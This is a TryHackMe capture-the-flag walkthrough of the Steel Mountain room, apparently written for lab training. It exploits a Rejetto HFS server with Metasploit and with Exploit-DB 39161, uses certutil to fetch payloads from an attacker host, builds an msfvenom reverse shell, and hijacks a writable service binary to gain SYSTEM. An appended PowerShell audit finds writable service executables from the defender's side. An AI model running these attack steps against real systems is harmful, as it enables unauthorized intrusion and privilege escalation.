Steel Mountain
Room Link: https://tryhackme.com/room/steelmountain
Walkthrough
Introduction
Who is the employee of the month?

Initial Access
Scan the machine with nmap. What is the other port running a web server on?
nmap -A 10.10.248.189
Take a look at the other web server. What file server is running?
Google this
What is the CVE number to exploit this file server?

Use Metasploit to get an initial shell. What is the user flag?
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set LHOST 10.10.62.157
set RHOSTS 10.10.181.159
set RPORT 8080
exploit
Option #2: Without Metasploit to get an initial shell. What is the user flag?
Exploit Link: https://www.exploit-db.com/raw/39161
For this exploit we usually only need to change ip_addr and local_port to point at our nc listener.

Because I performed this on a TryHackMe attacker box, which has port 80 in use for the web login, I had to change the exploit so the target fetches nc.exe from us on a different port.

nc -nvlp 443
cp /usr/share/wordlists/SecLists/Web-Shells/FuzzDB/nc.exe .
python2 -m SimpleHTTPServer 81
python2 exploit.py 10.10.181.159 8080

Privilege Escalation
Kali
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python2 -m SimpleHTTPServer 81
Windows
certutil -urlcache -f http://10.10.228.214:81/PowerUp.ps1 PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks
Kali
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.228.214 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
I couldn't delete the ASCService.exe, but I could replace it when I copied the file over with certutil.
Victim
cd C:\Program Files (x86)\IObit\Advanced SystemCare
sc stop AdvancedSystemCareService9
certutil -urlcache -f http://10.10.228.214:81/ASCService.exe ASCService.exe
Kali
nc -lvnp 4443
Victim
sc start AdvancedSystemCareService9
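As an added example that is not part of the original walkthrough, the PowerShell below audits from the defender's side what PowerUp's Invoke-AllChecks reported above: services whose executable grants write-type access to low-privilege groups, which is the weakness the ASCService.exe swap depends on. The principal list and the rights mask are my own choices; nothing here is taken from PowerUp.

```powershell
# Added example: list services whose binary can be modified by low-privilege principals.
# A service binary writable by Users/Everyone lets anyone replace it and have SYSTEM
# run their code on the next service start; this reports that misconfiguration.

# Principals that should never hold write rights on a service executable (my choice).
$weakPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
)
# Only write-type bits: Read/ReadAndExecute share no bits with these, so read-only ACEs
# are not reported. Generic access bits (0x40000000 etc.) are not expanded here.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted, or unquoted with spaces and arguments; return the .exe only.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName.Split(' ')[0]
}

function Find-WritableServiceBinaries {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { return }
        $acl = Get-Acl -LiteralPath $bin
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Binary    = $bin
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Find-WritableServiceBinaries | Format-Table -AutoSize
```

Any row returned is a finding: tighten the ACL on the binary (and its directory) so only Administrators and SYSTEM can write, then restart the service and re-run the audit.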